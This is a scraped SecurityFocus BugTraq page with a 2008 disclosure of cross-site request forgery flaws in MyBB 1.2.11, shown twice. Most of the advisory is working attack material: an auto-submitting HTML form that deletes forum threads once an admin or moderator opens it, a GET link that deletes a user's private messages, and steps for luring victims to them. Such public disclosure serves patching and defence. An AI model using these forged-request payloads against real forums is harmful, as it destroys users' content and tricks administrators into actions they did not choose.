Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
MyBB 1.2.11 Multiple XSRF Vulnerabilities
Jan 18 2008 08:50PM
nbbn gmx net
####################################################
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################
####1) Delete Threads XSRF Vulnerabilitie:
<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>
</body>
</html>
###Poc:
1. Create a .html file and copy the code into it.
2. Upload the file and now send the link to an admin or moderator
3. Done
####2) Delete PM's XSRF Vuln:
This one is only doing via GET and no question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
###Poc: (An easy way):
1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################
####1) Delete Threads XSRF Vulnerabilitie:
<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>
</body>
</html>
###Poc:
1. Create a .html file and copy the code into it.
2. Upload the file and now send the link to an admin or moderator
3. Done
####2) Delete PM's XSRF Vuln:
This one is only doing via GET and no question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
###Poc: (An easy way):
1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done
[ reply ]